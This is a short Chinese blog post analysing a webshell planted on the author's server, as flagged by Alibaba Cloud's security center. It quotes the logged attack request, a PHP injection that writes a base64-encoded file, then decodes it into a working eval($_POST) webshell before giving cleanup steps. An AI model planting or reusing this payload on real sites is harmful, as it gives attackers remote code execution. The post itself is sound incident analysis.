记录一次Webshell后门植入

告警原因：外部入侵

详情：WebShell告警通常是因为Web应用服务存在漏洞被攻击者利用后植入了恶意文件。

建议：建议您采取如下措施处理该告警：1. 确认该文件是否是恶意文件; 2. 清除主机上的其他WebShell文件;3. 修复Web应用存在的弱点或漏洞，

避免再次被入侵; 4. 评估入侵事件的影响，采取进一步的调查和补救措施。

*这个是阿里云的云安全中心提示的我个小菜鸡怎么会发现后门呢 o(*￣︶￣*)o

后门语句：

[ 2021-07-21T02:56:30+08:00 ] 136.144.41.223 GET //index.php?m=--><?=file_put_contents('nice.php',base64_decode("

PD9waHAKY2xhc3MgeHsKICAgIHB1YmxpYyBmdW5jdGlvbiBpcCgpewogICAgICAgICRjPSAiICRfUE9TVFtuaWNlXSI7C

iAgICAgICAgcmV0dXJuICRjOwogICAgfQp9CiRjID0gbmV3IHgoKTsKJGIgPSAkYyAtPiBpcCgpOwpldmFsKCRiKTsKcHJp

bnQobWQ1KCJSaW5nbyIpKTsKPz4="));?>

解析：

#在指定文件下添加内容

file_put_contents()

#解码base64

base64_decode()

#要添加内容的文件

nice.php

#添加的内容

PD9waHAKY2xhc3MgeHsKICAgIHB1YmxpYyBmdW5jdGlvbiBpcCgpewogICAgICAgICRjPSAiICRfUE9TVFtuaWNlXSI7C

iAgICAgICAgcmV0dXJuICRjOwogICAgfQp9CiRjID0gbmV3IHgoKTsKJGIgPSAkYyAtPiBpcCgpOwpldmFsKCRiKTsKcHJp

bnQobWQ1KCJSaW5nbyIpKTsKPz4=

#解码后的添加内容

<?php
　　class x{
　　　　public function ip(){
　　　　　　$c= " $_POST[nice]";
　　　　　　return $c;
　　　　}
　　}
　　$c = new x();
　　$b = $c -> ip();
　　eval($b);
　　print(md5("Ringo"));
?>

大概意思就是在nice.php文件中添加上方代码

处理方案：

扫出nice.php文件替换或者删除

屏蔽eval()函数